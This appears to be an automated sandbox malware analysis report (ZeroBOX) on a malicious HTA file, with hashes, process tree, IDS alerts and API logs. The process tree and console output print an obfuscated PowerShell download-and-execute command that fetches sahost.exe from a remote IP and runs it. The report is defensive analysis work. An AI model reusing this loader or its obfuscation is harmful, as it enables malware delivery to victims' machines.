Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Aug. 6, 2024, 5:37 p.m.	Aug. 6, 2024, 5:41 p.m.

Size	152.3KB
Type	HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5	`18b180ddf4a0d3df2fa8aa3b1ae06daf`
SHA256	`77372e54cb633d52685ad88856e39d9e22b2efffd19293b4aca7fa9157f989a8`
CRC32	`A0B83197`
ssdeep	`768:tZ6A3yXNA0AGAA/V68G600U8eBcElJuUaLpsFcN+6fQiXAZO:teA84H56`
Yara	None matched

mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\90.hta
2548
- cmd.exe "C:\Windows\system32\cmd.exe" "/c pOwERsHElL.exe -EX BYPAsS -NoP -w 1 -C DeViCeCReDENTiALdePLOYmeNT ; Iex($(iEx('[systeM.TeXt.ENCodIng]'+[ChAR]58+[CHaR]0x3a+'utF8.GeTStRiNg([sYSTeM.cONVeRT]'+[cHAr]0X3a+[cHAR]0X3a+'FrOmbaSe64sTRING('+[CHAr]34+'JFZMd2ptICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlUkRFRmlOaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHV6UERRc2ZrSCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWUZEWllOVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3V2dUlEcUphZSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpsbyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdW9ES2lxS0l3cUMpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlFBZGhGdSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTHVrVndoQyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRWTHdqbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xMzgvOTAvc2Fob3N0LmV4ZSIsIiRlbnY6QVBQREFUQVxzYWhvc3QuZXhlIiwwLDApO1N0YXJULVNsZWVwKDMpO3N0YVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcc2Fob3N0LmV4ZSI='+[cHAR]34+'))')))"
  2640
  - powershell.exe pOwERsHElL.exe -EX BYPAsS -NoP -w 1 -C DeViCeCReDENTiALdePLOYmeNT ; Iex($(iEx('[systeM.TeXt.ENCodIng]'+[ChAR]58+[CHaR]0x3a+'utF8.GeTStRiNg([sYSTeM.cONVeRT]'+[cHAr]0X3a+[cHAR]0X3a+'FrOmbaSe64sTRING('+[CHAr]34+'JFZMd2ptICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlUkRFRmlOaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHV6UERRc2ZrSCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWUZEWllOVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3V2dUlEcUphZSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpsbyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdW9ES2lxS0l3cUMpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlFBZGhGdSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTHVrVndoQyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRWTHdqbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xMzgvOTAvc2Fob3N0LmV4ZSIsIiRlbnY6QVBQREFUQVxzYWhvc3QuZXhlIiwwLDApO1N0YXJULVNsZWVwKDMpO3N0YVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcc2Fob3N0LmV4ZSI='+[cHAR]34+'))')))"
    2732
    - csc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\wxt848r0.cmdline"
      2852
      - cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RESFB39.tmp" "c:\Users\test22\AppData\Local\Temp\CSCFB28.tmp"
        2912

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
192.3.176.138	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49174 -> 192.3.176.138:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.3.176.138:80 -> 192.168.56.101:49174	2022050	ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1	A Network Trojan was detected
TCP 192.3.176.138:80 -> 192.168.56.101:49174	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 192.3.176.138:80 -> 192.168.56.101:49174	2022051	ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2	A Network Trojan was detected
TCP 192.3.176.138:80 -> 192.168.56.101:49174	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW Aug. 6, 2024, 5:36 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 6, 2024, 5:36 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 6, 2024, 5:36 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 6, 2024, 5:36 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 6, 2024, 5:36 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 6, 2024, 5:36 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 6, 2024, 5:36 p.m.			0	0

Command line console output was observed (44 events)

Time & API	Arguments	Status	Return
WriteConsoleW Aug. 6, 2024, 5:36 p.m.	buffer: The term 'DeViCeCReDENTiALdePLOYmeNT' is not recognized as the name of a cmdlet console_handle: 0x00000023	1	1
WriteConsoleW Aug. 6, 2024, 5:36 p.m.	buffer: , function, script file, or operable program. Check the spelling of the name, o console_handle: 0x0000002f	1	1
WriteConsoleW Aug. 6, 2024, 5:36 p.m.	buffer: r if a path was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW Aug. 6, 2024, 5:36 p.m.	buffer: At line:1 char:27 console_handle: 0x00000047	1	1
WriteConsoleW Aug. 6, 2024, 5:36 p.m.	buffer: + DeViCeCReDENTiALdePLOYmeNT <<<< ; Iex($(iEx('[systeM.TeXt.ENCodIng]'+[ChAR]5 console_handle: 0x00000053	1	1
WriteConsoleW Aug. 6, 2024, 5:36 p.m.	buffer: 8+[CHaR]0x3a+'utF8.GeTStRiNg([sYSTeM.cONVeRT]'+[cHAr]0X3a+[cHAR]0X3a+'FrOmbaSe6 console_handle: 0x0000005f	1	1
WriteConsoleW Aug. 6, 2024, 5:36 p.m.	buffer: 4sTRING('+[CHAr]34+'JFZMd2ptICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICA console_handle: 0x0000006b	1	1
WriteConsoleW Aug. 6, 2024, 5:36 p.m.	buffer: gICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgIC console_handle: 0x00000077	1	1
WriteConsoleW Aug. 6, 2024, 5:36 p.m.	buffer: AgICAgLW1lbUJlUkRFRmlOaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJb console_handle: 0x00000083	1	1
WriteConsoleW Aug. 6, 2024, 5:36 p.m.	buffer: XBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0g console_handle: 0x0000008f	1	1
WriteConsoleW Aug. 6, 2024, 5:36 p.m.	buffer: Q2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0Z console_handle: 0x0000009b	1	1
WriteConsoleW Aug. 6, 2024, 5:36 p.m.	buffer: pbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHV6UERRc2ZrSCxzdHJpbmcgIC console_handle: 0x000000a7	1	1
WriteConsoleW Aug. 6, 2024, 5:36 p.m.	buffer: AgICAgICAgICAgICAgICAgICAgICAgICAgICAgWUZEWllOVixzdHJpbmcgICAgICAgICAgICAgICAgI console_handle: 0x000000b3	1	1
WriteConsoleW Aug. 6, 2024, 5:36 p.m.	buffer: CAgICAgICAgICAgICAgR3V2dUlEcUphZSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg console_handle: 0x000000bf	1	1
WriteConsoleW Aug. 6, 2024, 5:36 p.m.	buffer: IFpsbyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdW9ES2lxS0l3cUMpOycgICA console_handle: 0x000000cb	1	1
WriteConsoleW Aug. 6, 2024, 5:36 p.m.	buffer: gICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgIC console_handle: 0x000000d7	1	1
WriteConsoleW Aug. 6, 2024, 5:36 p.m.	buffer: AgICAgIlFBZGhGdSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzcGFDRSAgICAgI console_handle: 0x000000e3	1	1
WriteConsoleW Aug. 6, 2024, 5:36 p.m.	buffer: CAgICAgICAgICAgICAgICAgICAgICAgICBsTHVrVndoQyAgICAgICAgICAgICAgICAgICAgICAgICAg console_handle: 0x000000ef	1	1
WriteConsoleW Aug. 6, 2024, 5:36 p.m.	buffer: ICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRWTHdqbTo6VVJMRG9 console_handle: 0x000000fb	1	1
WriteConsoleW Aug. 6, 2024, 5:36 p.m.	buffer: 3bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xMzgvOTAvc2Fob3N0LmV4ZSIsIiRlbnY6QV console_handle: 0x00000107	1	1
WriteConsoleW Aug. 6, 2024, 5:36 p.m.	buffer: BQREFUQVxzYWhvc3QuZXhlIiwwLDApO1N0YXJULVNsZWVwKDMpO3N0YVJUICAgICAgICAgICAgICAgI console_handle: 0x00000113	1	1
WriteConsoleW Aug. 6, 2024, 5:36 p.m.	buffer: CAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcc2Fob3N0LmV4ZSI='+[cHAR]34+'))'))) console_handle: 0x0000011f	1	1
WriteConsoleW Aug. 6, 2024, 5:36 p.m.	buffer: + CategoryInfo : ObjectNotFound: (DeViCeCReDENTiALdePLOYmeNT:Stri console_handle: 0x0000012b	1	1
WriteConsoleW Aug. 6, 2024, 5:36 p.m.	buffer: ng) [], CommandNotFoundException console_handle: 0x00000137	1	1
WriteConsoleW Aug. 6, 2024, 5:36 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000143	1	1
WriteConsoleW Aug. 6, 2024, 5:36 p.m.	buffer: Start-Process : This command cannot be executed due to the error: %1 is not a v console_handle: 0x00000023	1	1
WriteConsoleW Aug. 6, 2024, 5:36 p.m.	buffer: alid Win32 application. console_handle: 0x0000002f	1	1
WriteConsoleW Aug. 6, 2024, 5:36 p.m.	buffer: At line:1 char:859 console_handle: 0x0000003b	1	1
WriteConsoleW Aug. 6, 2024, 5:36 p.m.	buffer: + $VLwjm = ADd-TYpE console_handle: 0x00000047	1	1
WriteConsoleW Aug. 6, 2024, 5:36 p.m.	buffer: -memBeRDEFiNiTiOn console_handle: 0x00000053	1	1
WriteConsoleW Aug. 6, 2024, 5:36 p.m.	buffer: '[DllImport("uRLmoN.dLl", CharSet = CharSet.Unico console_handle: 0x0000005f	1	1
WriteConsoleW Aug. 6, 2024, 5:36 p.m.	buffer: de)]public static extern IntPtr URLDownloadToFile(IntPtr console_handle: 0x0000006b	1	1
WriteConsoleW Aug. 6, 2024, 5:36 p.m.	buffer: uzPDQsfkH,string YFDZYNV,string console_handle: 0x00000077	1	1
WriteConsoleW Aug. 6, 2024, 5:36 p.m.	buffer: GuvuIDqJae,uint Zlo,IntPtr console_handle: 0x00000083	1	1
WriteConsoleW Aug. 6, 2024, 5:36 p.m.	buffer: uoDKiqKIwqC);' -Name console_handle: 0x0000008f	1	1
WriteConsoleW Aug. 6, 2024, 5:36 p.m.	buffer: "QAdhFu" -naMespaC console_handle: 0x0000009b	1	1
WriteConsoleW Aug. 6, 2024, 5:36 p.m.	buffer: E lLukVwhC -PassThr console_handle: 0x000000a7	1	1
WriteConsoleW Aug. 6, 2024, 5:36 p.m.	buffer: u; $VLwjm::URLDownloadToFile(0,"http://192.3.176. console_handle: 0x000000b3	1	1
WriteConsoleW Aug. 6, 2024, 5:36 p.m.	buffer: 138/90/sahost.exe","$env:APPDATA\sahost.exe",0,0);StarT-Sleep(3);staRT <<<< console_handle: 0x000000bf	1	1
WriteConsoleW Aug. 6, 2024, 5:36 p.m.	buffer: "$enV:APPDATA\sahost.exe" console_handle: 0x000000cb	1	1
WriteConsoleW Aug. 6, 2024, 5:36 p.m.	buffer: + CategoryInfo : InvalidOperation: (:) [Start-Process], InvalidOp console_handle: 0x000000d7	1	1
WriteConsoleW Aug. 6, 2024, 5:36 p.m.	buffer: erationException console_handle: 0x000000e3	1	1
WriteConsoleW Aug. 6, 2024, 5:36 p.m.	buffer: + FullyQualifiedErrorId : InvalidOperationException,Microsoft.PowerShell.C console_handle: 0x000000ef	1	1
WriteConsoleW Aug. 6, 2024, 5:36 p.m.	buffer: ommands.StartProcessCommand console_handle: 0x000000fb	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 95 events)

Time & API	Arguments	Status	Return
CryptExportKey Aug. 6, 2024, 5:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e4d50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 6, 2024, 5:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e52d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 6, 2024, 5:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e52d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 6, 2024, 5:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e52d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 6, 2024, 5:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e54d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 6, 2024, 5:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e54d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 6, 2024, 5:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e54d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 6, 2024, 5:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e54d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 6, 2024, 5:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e54d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 6, 2024, 5:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e54d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 6, 2024, 5:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e4d10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 6, 2024, 5:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e4d10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 6, 2024, 5:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e4d10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 6, 2024, 5:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e52d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 6, 2024, 5:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e52d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 6, 2024, 5:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e52d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 6, 2024, 5:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e4910 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 6, 2024, 5:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e52d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 6, 2024, 5:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e52d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 6, 2024, 5:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e52d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 6, 2024, 5:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e52d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 6, 2024, 5:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e52d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 6, 2024, 5:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e52d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 6, 2024, 5:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e52d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 6, 2024, 5:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e5650 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 6, 2024, 5:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e5650 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 6, 2024, 5:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e5650 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 6, 2024, 5:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e5650 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 6, 2024, 5:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e5650 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 6, 2024, 5:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e5650 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 6, 2024, 5:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e5650 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 6, 2024, 5:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e5650 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 6, 2024, 5:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e5650 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 6, 2024, 5:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e5650 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 6, 2024, 5:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e5650 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 6, 2024, 5:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e5650 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 6, 2024, 5:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e5650 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 6, 2024, 5:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e5650 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 6, 2024, 5:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e5590 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 6, 2024, 5:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e5590 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 6, 2024, 5:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e5590 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 6, 2024, 5:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e5590 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 6, 2024, 5:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e5590 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 6, 2024, 5:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e5590 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 6, 2024, 5:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e5590 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 6, 2024, 5:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e5590 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 6, 2024, 5:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x061deab0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 6, 2024, 5:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x061deab0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 6, 2024, 5:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x061deab0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 6, 2024, 5:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x061deab0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Aug. 6, 2024, 5:36 p.m.		1	1	0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

Connection to IP address

suspicious_request

GET http://192.3.176.138/90/sahost.exe

Performs some HTTP requests (1 event)

request

GET http://192.3.176.138/90/sahost.exe

Allocates read-write-execute memory (usually to unpack itself) (50 out of 154 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Aug. 6, 2024, 5:36 p.m.	process_identifier: 2548 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73bc2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 6, 2024, 5:36 p.m.	process_identifier: 2548 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03550000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 6, 2024, 5:36 p.m.	process_identifier: 2548 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03550000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 6, 2024, 5:36 p.m.	process_identifier: 2732 region_size: 1769472 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02910000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 6, 2024, 5:36 p.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 6, 2024, 5:36 p.m.	process_identifier: 2732 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 6, 2024, 5:36 p.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026aa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 6, 2024, 5:36 p.m.	process_identifier: 2732 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 6, 2024, 5:36 p.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 6, 2024, 5:36 p.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 6, 2024, 5:36 p.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a81000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 6, 2024, 5:36 p.m.	process_identifier: 2732 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a82000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 6, 2024, 5:36 p.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0271a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 6, 2024, 5:36 p.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
